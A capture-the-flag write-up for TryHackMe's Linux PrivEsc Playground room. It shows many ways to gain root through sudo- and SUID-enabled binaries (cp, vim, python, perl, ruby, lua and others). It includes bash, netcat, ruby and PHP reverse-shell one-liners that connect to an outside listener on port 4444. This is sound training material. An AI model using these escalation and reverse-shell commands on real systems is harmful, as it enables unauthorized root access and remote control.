THM - Privesc playground
Check it out at TryHackMe Linux PrivEsc Playground
Room created by SherlockSec, TryHackMe profile or also on twitter @SherlockSec
Picture this, you've popped a reverse shell on some ctf box through some complicated exploit. Grabbed the user flag, but then what? You need root! It's PrivEsc (Privelage Escalation) time.
This room has now been removed from TryHackMe by the creator. If you'd like to re-create it, just add suid to every binary in your path.
Enumerating
This box is designed to be really easy to get root on, with the challenge being "How many ways can you find to PrivEsc to root?"
First, let's start out with something super simple. Normally this only works in beginner/intermediate CTFs. Let's find out what commands our user can run as sudo!
bash-4.2$ ls
bash-4.2$ whoami
user
bash-4.2$ sudo -l
Matching 'Defaults' entries for user on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user may run the following commands on this host:
(root) NOPASSWD: /bin/apt-get*, (root) /bin/apt*, (root)
/usr/bin/aria2c, (root) /usr/sbin/arp, (root) /bin/ash, (root)
/usr/bin/awk, (root) /usr/bin/base64, (root) /bin/bash, (root)
/bin/busybox, (root) /bin/cat, (root) /bin/chmod, (root) /bin/chown,
(root) /bin/cp, (root) /usr/bin/cpan, (root) /usr/bin/cpulimit, (root)
/bin/crontab, (root) /bin/csh, (root) /bin/curl, (root) /usr/bin/cut,
(root) /bin/dash, (root) /bin/date, (root) /bin/dd, (root)
/usr/bin/diff, (root) /bin/dmesg, (root) /sbin/dmsetup, (root)
/usr/bin/docker, (root) /usr/bin/dpkg, (root) /usr/bin/easy_install,
(root) /usr/bin/emacs, (root) /usr/bin/env, (root) /usr/bin/expand,
(root) /usr/bin/expect, (root) /usr/bin/facter, (root) /usr/bin/file,
(root) /usr/bin/find, (root) /usr/bin/flock, (root) /usr/bin/fmt,
(root) /usr/bin/fold, (root) /usr/bin/ftp, (root) /usr/bin/gawk,
(root) /usr/bin/gdb, (root) /usr/bin/gimp, (root) /usr/bin/git, (root)
/bin/grep, (root) /usr/bin/head, (root) /usr/sbin/iftop, (root)
/usr/bin/ionice, (root) /sbin/ip, (root) /usr/bin/irb, (root)
/usr/bin/jq, (root) /usr/bin/ksh, (root) /sbin/ldconfig, (root)
/usr/bin/less, (root) /sbin/logsave, (root) /usr/bin/ltrace, (root)
/usr/bin/lua, (root) /usr/bin/make, (root) /usr/bin/man, (root)
/usr/bin/mawk, (root) /bin/more, (root) /bin/mount, (root)
/usr/bin/mtr, (root) /bin/mv, (root) /usr/bin/nano, (root)
/usr/bin/nawk, (root) /bin/nc, (root) /usr/bin/nice, (root)
/usr/bin/nl, (root) /usr/bin/nmap, (root) /usr/sbin/node, (root)
/usr/bin/od, (root) /usr/bin/openssl, (root) /usr/bin/perl, (root)
/usr/bin/pg, (root) /usr/bin/php, (root) /usr/bin/pic, (root)
/usr/bin/pico, (root) /usr/bin/pip, (root) /usr/bin/puppet, (root)
/usr/bin/python, (root) /usr/bin/readelf, (root) /usr/bin/redm, (root)
/usr/bin/rlwrap, (root) /usr/bin/rsync, (root) /usr/bin/ruby, (root)
/usr/bin/run-mailcaps, (root) /bin/run-parts, (root) /usr/bin/rvim,
(root) /usr/bin/scp, (root) /usr/bin/screen, (root) /usr/bin/script,
(root) /bin/sed, (root) /usr/sbin/service, (root) /usr/bin/setarch,
(root) /usr/bin/sftp, (root) /usr/bin/smbclient, (root)
/usr/bin/socat, (root) /usr/bin/sort, (root) /usr/bin/sqlite3, (root)
/usr/bin/ssh, (root) /sbin/start-stop-daemon, (root) /usr/bin/stdbuf,
(root) /usr/bin/strace, (root) /usr/bin/tail, (root) /bin/tar, (root)
/usr/bin/taskset, (root) /usr/bin/tclsh, (root) /usr/sbin/tcpdump,
(root) /usr/bin/tee, (root) /usr/bin/telnet, (root) /usr/bin/tftp,
(root) /usr/bin/time, (root) /usr/bin/timeout, (root) /usr/bin/tmux,
(root) /usr/bin/ul, (root) /usr/bin/unexpand, (root) /usr/bin/uniq,
(root) /usr/bin/unshare, (root) /usr/bin/vi, (root) /usr/bin/vim,
(root) /usr/bin/watch, (root) /usr/bin/wget, (root) /usr/bin/xargs,
(root) /usr/bin/xxd, (root) /usr/bin/zip, (root) /usr/bin/zsh
Oh. Oh no. With so many binaries that I can run with sudo, the question is where to start! I don't even need to use the user's password, as these are all set with NOPASSWD. Flags are censored so that you actually run them yourself!
The next step is to find interesting SUID binaries
"Normal" Linux Utils
cp
bash-4.2$ sudo cp /root/flag.txt ~/flag.txt
bash-4.2$ ls
flag.txt
bash-4.2$ cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
cat
bash-4.2$ sudo cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
base64 - Technically sudo is optional as base64 has suid set.
bash-4.2$ sudo base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
bash-4.2$ base64 /root/flag.txt > /home/user/flag.b64
bash-4.2$ base64 -d flag.b64
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
xxd - with and without sudo. The SUID bit is set for xxd in /usr/bin.
bash-4.2$ sudo xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321 Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173 You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467 !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070 *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72 riv esc some mor
0000060: 6521 0a e!.
bash-4.2$ xxd /root/flag.txt
0000000: 436f 6e67 7261 7475 6c61 7469 6f6e 7321 Congratulations!
0000010: 2059 6f75 2067 6f74 2074 6865 2065 6173 You got the eas
0000020: 6965 7374 2066 6c61 6720 6f6e 2054 484d iest flag on THM
0000030: 210a 0a54 484d 7b33 6173 795f 6631 3467 !..THM{*********
0000040: 5f31 6d34 307d 0a0a 4e6f 7720 676f 2070 *****}..Now go p
0000050: 7269 7620 6573 6320 736f 6d65 206d 6f72 riv esc some mor
0000060: 6521 0a e!.
less/more
bash-4.2$ sudo less /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
/root/flag.txt (END)
bash-4.2$ sudo more /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Nano
bash-4.2$ sudo nano /root/flag.txt
GNU nano 2.2.6 File: /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Vim (and vi etc)
bash-4.2$ sudo vim
~
~
:sh
root@privesc:~# whoami
root
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Shells
bash
bash-4.2$ sudo bash
root@privesc:~# ls
flag.txt
root@privesc:~# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
root@privesc:~#
zsh
bash-4.2$ sudo zsh
privesc# whoami
root
privesc# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
ash
bash-4.2$ sudo ash
# whoami
root
# ls
flag.txt
# cat flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
ksh
bash-4.2$ sudo ksh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
dash
bash-4.2$ sudo dash
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
csh
bash-4.2$ sudo csh
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Programming/Scripting Languages
Python
bash-4.2$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Python 2.7, as /usr/bin/python2.7 has suid set.
python2.7 -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Perl
bash-4.2$ sudo perl -e 'exec "/bin/sh";'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Lua
bash-4.2$ sudo lua
Lua 5.0.3 Copyright (C) 1994-2006 Tecgraf, PUC-Rio
> os.execute('/bin/sh')
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{*************}
Now go priv esc some more!
Ruby IRB
bash-4.2$ sudo irb
irb(main):001:0> exec("/bin/bash")
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Ruby
bash-4.2$ sudo ruby -e 'exec "/bin/sh"'
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Reverse Shells
Pure bash
bash-4.2$ sudo bash -i >& /dev/tcp/10.x.x.x/4444 0>&1
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43367
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Netcat
bash-4.2$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43369
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
bash-4.2$ sudo ruby -rsocket -e'f=TCPSocket.open("10.x.x.x",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
root@privesc:~# whoami
root
root@privesc:~# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
This one is slightly more interesting, as PHP runs as root by default on this system. This is because the suid bit is set as shown by the ls command below.
bash-4.2$ ls -lah | grep php
lrwxrwxrwx 1 root root 21 Nov 27 19:59 php -> /etc/alternatives/php
-rwsr-xr-x 1 root root 7.8M Feb 13 2017 php5
bash-4.2$ php -r '$sock=fsockopen("10.8.6.110",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.10.32.113] 43371
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!
Python 2.7, as /usr/bin/python2.7, has suid set.
root@ninja:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.6.110] from (UNKNOWN) [10.10.32.113] 43374
# whoami
root
# cat /root/flag.txt
Congratulations! You got the easiest flag on THM!
THM{**************}
Now go priv esc some more!